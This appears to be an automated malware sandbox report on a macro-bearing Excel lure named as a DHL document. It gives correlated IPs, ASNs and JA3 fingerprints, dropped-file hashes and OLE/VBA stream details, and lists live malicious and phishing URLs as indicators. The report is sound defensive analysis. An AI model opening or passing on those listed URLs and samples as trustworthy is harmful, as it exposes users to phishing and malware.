                      https://url976.groupgreeting.com/ls/click?upn=u001.AR9Mx-2Futf8zCizRJR1zWQyjFk-2F3fmeHgwaoEX0sj7LNvLxadpcQbCDj9eJtuGOsRmTcCOtEDIvi3npIJpdt-2FygcYeLSRCs3fGYHfkoOHejg-3DgZ62_4R4PVUosj4-2FWzhrx0xFZHq-2FXxtG1noLp84vupaRf2f-2F6Jf4rFFugSxyqHO-2FVPdajKZ-2FPKCdfqHj1aQr4zVBYb-2FEiBjrf7ath0BgqOY6MdThf4Ae6yN8FoDZJ-2BES471XZIrwz7iAkdK0giDttZsBzovgq9NxI2-2BuYraN6hRcbg5qwW0IS05yUS-2BPM5pW0VKgLrNCJUgVrgrzp2w36AzstNmTrFZDmam4MO0pMwbNqPFZCmXMRYpEOCg3Y5zfycd31W586EO9HVlV7NTIqfFOApfW2AQ8BeOHlgje6iBlU-2Fd494BAvnto-2BkkldfXAJzgFqb-2Fw9gP0v6CLxifgeC3-2Fn9x825Lno7wROFv84v0gqYDmj0PBMsyCW6pksVIuBdLbNu1AK6m0Oxz2rwYMSz0uszf3d1mqsLV3QHi4lATMdkl3Xe-2B1t9H71pNVfArlAwSuTOueYLtMZOHS-2FCACoIdV-2F-2Byi-2BdX5-2BV48VlMGzeQ8XVuU-3DGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      s-0005.dual-s-msedge.netSecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      e25fb69..emlGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      SWIFTCOPY 20231707.docxGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      SWIFTCOPY 20231707.docxGet hashmaliciousUnknownBrowse
                      • 52.123.129.14
                      SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      phish_alert_sp2_2.0.0.0 (4).emlGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      payload.exe.bin.exeGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      bg.microsoft.map.fastly.netSecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      1VjDy92IJ7.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.214.172
                      cfooce_wps_yan.exeGet hashmaliciousMicroClipBrowse
                      • 199.232.214.172
                      Kloptonium-beta.exeGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      Antimony.exeGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      ZoddLzy4r9.exeGet hashmaliciousLockBit ransomwareBrowse
                      • 199.232.210.172
                      SecuriteInfo.com.W32.Lolbas.A.tr.24535.1660.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.214.172
                      SecuriteInfo.com.W32.Lolbas.A.tr.21840.28145.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.210.172
                      SecuriteInfo.com.W32.Lolbas.A.tr.9491.8922.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.214.172

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      AS-COLOCROSSINGUSSecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 172.245.123.24
                      (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.95.138
                      SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 172.245.123.24
                      hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                      • 107.172.154.249
                      KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                      • 192.3.129.109
                      2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.101.146
                      2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.101.146
                      QUOTATION#022450.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                      • 198.46.177.153
                      2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.101.146
                      Elm City Communities-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                      • 23.95.206.231
                      TIMEWEB-ASRU_________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      niga.jarGet hashmaliciousUnknownBrowse
                      • 2.59.41.142
                      GjThRAJ.exeGet hashmaliciousUnknownBrowse
                      • 2.59.41.142
                      splx86.elfGet hashmaliciousUnknownBrowse
                      • 92.53.113.157
                      i686.elfGet hashmaliciousMiraiBrowse
                      • 188.225.75.215
                      https://33kuritsi.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://gamma.app/docs/PDF-Scanned-Document-wldbj3tbiz3h3zk?mode=present#card-bc666izqridnjbrGet hashmaliciousHTMLPhisherBrowse
                      • 5.23.50.101
                      https://33kuritsi.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://gamma.app/docs/PDF-Scanned-Document-wldbj3tbiz3h3zk?mode=present#card-bc666izqridnjbrGet hashmaliciousUnknownBrowse
                      • 5.23.50.101
                      XkggQZnZYs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 92.53.120.241
                      SecuriteInfo.com.Win32.DropperX-gen.14963.7308.exeGet hashmaliciousUnknownBrowse
                      • 5.23.51.54
                      MICROSOFT-CORP-MSN-AS-BLOCKUSSecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.253.67
                      (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                      • 52.123.128.14
                      hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                      • 52.246.79.20
                      hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                      • 20.143.252.209
                      hgfs.mips.elfGet hashmaliciousUnknownBrowse
                      • 13.68.209.215
                      Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      hgfs.arm.elfGet hashmaliciousUnknownBrowse
                      • 104.209.52.12
                      hgfs.x86.elfGet hashmaliciousUnknownBrowse
                      • 20.232.168.146

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      6271f898ce5be7dd52b0fc260d0662b3(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      Wacatac 0.5.exeGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      https://valliappan2125.github.io/Amazon-Clone-Using-HTML-CSS-and-JS/Get hashmaliciousHTMLPhisherBrowse
                      • 188.225.72.170
                      https://bridge--ttrezzorr.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                      • 188.225.72.170
                      Subscription_Agreement_2025.svgGet hashmaliciousPhisherBrowse
                      • 188.225.72.170
                      SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      FW_ Remittance Address.msgGet hashmaliciousUnknownBrowse
                      • 188.225.72.170
                      a0e9f5d64349fb13191bc781f81f42e1(Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      SecuriteInfo.com.Win32.PWSX-gen.3592.16192.exeGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.60
                      W1FREE.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      Software Installer.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      Set-up.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                      • 13.107.246.60
                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.60
                      KMSPico Malware.zipGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.60
                      stk.vmp.dllGet hashmaliciousUnknownBrowse
                      • 13.107.246.60
                      trzRv3D3.exeGet hashmaliciousLummaC StealerBrowse
                      • 13.107.246.60

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                      Download File
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):118
                      Entropy (8bit):3.5700810731231707
                      Encrypted:false
                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                      MD5:573220372DA4ED487441611079B623CD
                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                      C:\Users\user\AppData\Local\Temp\791C9DB3.tmp

                      Download File
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):784
                      Entropy (8bit):2.7137690747287806
                      Encrypted:false
                      SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                      MD5:09F73B3902CD3D88E04312787956B654
                      SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                      SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                      SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                      C:\Users\user\AppData\Local\Temp\~DFEB53724B8646423B.TMP

                      Download File
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\Desktop\~$DHL 733988905ZHH.xla.xlsx

                      Download File
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.7769794087092887
                      Encrypted:false
                      SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                      MD5:37BD8218D560948827D3B948CAFA579C
                      SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                      SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                      SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                      Malicious:true
                      Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      Static File Info

                      General

                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Mar 14 03:54:01 2025, Security: 1
                      Entropy (8bit):7.8312397036284
                      TrID:
                      • Microsoft Excel sheet (30009/1) 47.99%
                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                      File name:DHL 733988905ZHH.xla.xlsx
                      File size:1'172'992 bytes
                      MD5:221f228dfa20495a79346d343e9247dc
                      SHA1:9cb6b9b2789a5a227c6561790ea353507713f98c
                      SHA256:279212a280629727edeb1bab801d30116de12ed162400753638a7ec51523aa1b
                      SHA512:e3ca05ec2d263a621000a2c45936805330a7a89766a2f440c28df68822c873fa2a0163446d8474720ec2498c5cde600924188017383290d34d592e8cec10d684
                      SSDEEP:24576:rLA6DHtWjejsk4McuyJIwgxIOXR8YhbBWvdp8tLUWBMDcfI4AQ:gSaejH4MTyzguM8YkpwLUwh1AQ
                      TLSH:0E450294BFC09626DA1D02350FE38B1C5915EEEB5755620F3236BE2D3EB6A3E0B72105
                      File Content Preview:........................>......................................................................................................................................................................................................................................

                      File Icon

                      Icon Hash:35e58a8c0c8a85b9

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "DHL 733988905ZHH.xla.xlsx"

                      Indicators
                      Has Summary Info:
                      Application Name:Microsoft Excel
                      Encrypted Document:True
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:True
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:False
                      Flash Objects Count:0
                      Contains VBA Macros:True
                      Summary
                      Code Page:1252
                      Author:
                      Last Saved By:
                      Create Time:2006-09-16 00:00:00
                      Last Saved Time:2025-03-14 03:54:01
                      Creating Application:Microsoft Excel
                      Security:1
                      Document Summary
                      Document Code Page:1252
                      Thumbnail Scaling Desired:False
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:786432

                      Streams with VBA

                      VBA File Name: Sheet1.cls, Stream Size: 977
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                      VBA File Name:Sheet1.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d c3 af 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      VBA Code
                      Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                      VBA File Name: Sheet2.cls, Stream Size: 977
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                      VBA File Name:Sheet2.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = % . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d d9 25 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      VBA Code
                      Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                      VBA File Name: Sheet3.cls, Stream Size: 977
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                      VBA File Name:Sheet3.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d f8 cc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      VBA Code
                      Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                      VBA File Name: ThisWorkbook.cls, Stream Size: 985
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                      VBA File Name:ThisWorkbook.cls
                      Stream Size:985
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d 14 ed 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      VBA Code
                      Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                      General
                      Stream Path:\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:244
                      Entropy:2.889430592781307
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                      General
                      Stream Path:\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:200
                      Entropy:3.2920681057018664
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                      Stream Path: MBD0077BD89/\x1CompObj, File Type: data, Stream Size: 114
                      General
                      Stream Path:MBD0077BD89/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: MBD0077BD89/\x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                      General
                      Stream Path:MBD0077BD89/\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:296
                      Entropy:3.2973193143624515
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                      Stream Path: MBD0077BD89/\x5SummaryInformation, File Type: data, Stream Size: 31156
                      General
                      Stream Path:MBD0077BD89/\x5SummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:31156
                      Entropy:3.1876994904322484
                      Base64 Encoded:True
